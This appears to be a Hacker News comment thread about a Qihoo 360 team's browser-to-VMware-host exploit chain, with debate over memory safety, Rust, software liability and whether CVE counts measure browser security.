> Why? That goes against everything we've done to categorize bugs - we do not treat all bugs the same, and we would not consider all bugs to be due to negligence.

That would be something you could only know by evaluating this on a bug-by-bug basis, the important thing to realize is that to an end user it simply does not matter what class of bug caused their data-loss, loss of privacy or loss of assets.


My point is that not all bugs lead to data loss or loss of privacy. But yes, I agree.

That said, I feel that we're now talking about memory safety vs semantic safety.

We can certainly prove a program is entirely memory safe. Rust's type system is prove, so the work is then to prove the unsafe code safe (actively being researched).

There is no way to prove all semantics of a program (Rice's theorem). Therefor I would argue that a bug is due to a semantic issue is not necessarily negligent, whereas we could easily see memory safety issues from using C as a case of negligence.

But in terms of liability they would likely both fall into the same bucket.


Negligence in the legal sense of the word revolves around care. If someone is maintaining some codebase and causes a memory safety related bug you would have to look at that bug in isolation and what the person did to avoid it. Saying 'you should have rewritten this in rust in order to avoid liability' is not a standard of care that anybody will ever be held to.

So the ideal as you perceive it is so far from realistic that I do not believe pursuing that road is fruitful.

What we can do is class bugs (or actually, the results of bugs, the symptoms that cause quantifiable losses) in general as a source of (limited) liability. This will put those parties out of business that are unable to get their house in order without mandating one technology over another (which would definitely be seen as giving certain parties a competitive edge, something I don't think will be ever done).

So that's why I believe that solution is the better one.

But in a perfect world your solution would - obviously - be the better one, unfortunately we live in this one.


> Saying 'you should have rewritten this in rust in order to avoid liability' is not a standard of care that anybody will ever be held to.

Why is 'you should not have exposed C code to the internet' an unreasonable basis for care?

I'm not saying your approach is wrong, I think they're not mutually exclusive - your solution would provide incentive to not use C in a technology agnostic way. But at some point isn't it just irresponsible to write critical infrastructure, or code that exposes user information, in a language that has historically been a disaster for security?


> Why is 'you should not have exposed C code to the internet' an unreasonable basis for care?

Because it does not mesh with reality. There are 100's of millions of lines of C code exposed to the internet in all layers of the stack. So if you start off with a hardcore position like that you virtually ensure that your plan will not be adopted.

It's the legacy that is the problem, not the future.


That's one of the arguments for SaferCPlusPlus[1]. It's a (high performance) option for retrofitting memory safety to existing C/C++ codebases. It requires (straightforward) modifications to the existing code, but involves much less effort than a complete rewrite. A tool to (mostly) automate the required modifications is being worked on. (But more resources might hasten its progress, if any of those well-resourced entities wanted to redirect some of their efforts from vulnerability detection and mitigation to prevention :)

Just out of curiosity, what kind of performance penalty are people be willing to accept in exchange for memory safety?

[1] shameless plug: https://github.com/duneroadrunner/SaferCPlusPlus


Statements like these always remind me of the FUSSP [0].

I'm not anything close to a developer (scripting to scratch my own itches is the extent of any "development" I do) so I can't claim to truly understand the issues other than generally, at a high-level.

I've heard variations of this argument -- "Rust will save us!", if I may exaggerate slightly -- many, many times and it seems to be occurring more often lately. It makes me genuinely wonder, then, why isn't the first priority to immediately begin work to rewrite all of the existing "legacy" code in Rust? IIUC, Mozilla has been working on rewriting Firefox is Rust -- which is A Good Thing(TM), it seems -- but that's the only major piece of software I've heard about.

If Rust truly is this panacea that it's often made out to be, why is code continuing to be written in anything other than Rust?

[0]: https://www.rhyolite.com/anti-spam/you-might-be.html


There are many, many factors that need to be taken into account when asking "will this technology succeed" and only one of those factors is "is the technology good/ better than what exists now".

Familiarity is a huge one that impacts adoption. There's many other factors discussed.

In the book The Diffusion Of Innovation there are two great examples given.

The first is a health official trying to convince a town of people to boil their water in order to avoid infection. They utterly failed to convince anyone to do so because the concept of 'germs' was totally unfamiliar to these people, and the need to boil water conflicted with their cultural conception of the issue.

The other is dvorak - a keyboard layout that is, by some metric, objectively better than QWERTY. And yet adoption barely exists.

The reasons rust is not being used to replace C everywhere are many - Rust is young, many people do not want to learn rust, many people do not care about software security, rust has an unfamiliar syntax/ concepts in it, rust has a younger ecosystem, etc.

There is also the issue of liability in software. If I write an internet facing text-parser in C, and it's full of vulnerabilities, I am not liable. My negligence in technology choice (and I do consider it negligence) does not impact liability, unlike any other engineering discipline. So why change?


Every few years there is something. The sandbox, the VMs, Rust, etc.

Some things never change.


I don't think I'd want to take credit for a hack like this. I imagine a few interesting phone calls are heading the researchers way.


They're a team from Qihoo360 a large Chinese security company. They do a tonne of this kind of research, so I'd imagine the company are used to it by now.

If you look at pwn2own or similar for the last couple of years you'll see a variety of their teams cropping up...


"All started from and only by a controlled a website"

That is really scary. And another reason to limit/disable JavaScript (if somebody still don't find enough). Has anyone found more detailed report? I'd love to see this in action.


Perfect storm.


> We used a JavaScript engine bug within Microsoft Edge to achieve the code execution inside the Edge sandbox, and we used a Windows 10 kernel bug to escape from it and fully compromise the guest machine," ...

What? The security of VMware relies on the security of the guest OS? Really a surprise, and a horrible, for me.

btw, how many people are using Edge browser? 1%? And how many of them use it in VM? 1%%%? :-)


No, it does not. Here is the next sentence from the article:

"Then we exploited a hardware simulation bug within VMware to escape from the guest operating system to the host one. All started from and only by a controlled a website."


Thanks for clarification.

So the key of the hacking is a hardware simulation bug within VMware. It is not a surprise to exploit the security holes in Edge at all.


Edge isn't nearly the security nightmare that Internet Explorer was and runs sandboxed in a similar manner as Chrome so you shouldn't underestimate the impressiveness of that first escape either.


not even close. Just look at the CVE listings for 2016 Chrome vs Edge. Edge: 74 code execution vulnerabilities, Chrome: 2


CVE listings are not a meaningful metric at all for security. What that could reflect is that Edge's bounty program is far more popular than Chrome's. It could mean that Edge is willing to hand out CVEs for uncomfirmed bugs whereas Chrome requires further proof (I am not saying this is the case at all, to be clear).


If.you have another metric please offer it.

I have no reason to believe the metrics are biased. A similar number of issues appear for all browsers . The difference is the type of issue.

Of course you're free to just take it on faith that Edge is more secure because Microsoft says so and that the CVE listings have no purpose being used as a comparison. But for me, without finding some other metric to compare by I'll use this metric until there's a better replacement


> If.you have another metric please offer it.

Evaluating the security of a product is a fairly rigorous task with no clear, objective 'this one is strictly more secure' outcome possible.

> I have no reason to believe the metrics are biased.

I gave you multiple reasons why they could be based on a number of things. Not to mention that they seem flat out wrong - Chrome has dozens of security vulnerabilities patched every month. Maybe they don't create CVEs for all of them?

> Of course you're free to just take it on faith that Edge is more secure because Microsoft says so

I don't take it on their word. I have multiple reasons to believe that Edge is a pretty secure browser - I never said it is more secure than Chrome.

Here is a really solid post, that I felt was particularly unbias, by Justin Schuh, who works for (or is the head of? Can't remember) Chrome's security.

https://medium.com/@justin.schuh/securing-browsers-through-i...

As you can read, they both take fairly different approaches that are hard to compare objectively. Is a sandbox improvement more powerful than a new mitigation technique? Again, impossible to say. As Justin states, they're doing solid work though.

> that the CVE listings have no purpose being used as a comparison.

CVE has nothing to do with comparing the security of products and everything to do with notifying users of that products that they need to patch.

> But for me, without finding some other metric to compare by I'll use this metric until there's a better replacement

"I have no tools to compare, so I will use an arbitrary, incorrect tool to compare"

This is totally faulty logic. CVEs are not a metric for evaluating security and they were never intended for such a thing. If you want to actually evaluate software security it is a serious, real process that requires more discipline than saying "well some numbers that have no meaning should be good enough".


Are there any reasons Edge won't go open source? Avoid too many bugs been found?


You think that Edge is closed source to avoid more bugs being found, but Microsoft also pays 3rd party developers for finding bugs in Edge?


You didn't answer my question at all. Are there any special reasons Edge has not been open sourced yet?


I didn't really understand what your question was, it sounded as if you were trying to imply the reason yourself.

I do not work for Microsoft, I have no insight into their decision making process. I doubt it has to do with security.


The JavaScript engine is open source:

https://github.com/Microsoft/ChakraCore


Given that Chrome runs on many platforms, and Edge one, it makes this even more sobering


This may not fit your preconceptions, but the article is saying that Edge is considered a difficult target for hacking.



As I said above, CVE listings are a useless metric for measuring safety of a product. High # of CVEs can easily indicate a safer product with a more mature bug bounty program or an attitude of "Assume it's vulnerable, don't require full exploits to prove it".

There is no good information to be drawn from those two links.


I think the key is having all three at once?


The last vm escape is very impressive at its own.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: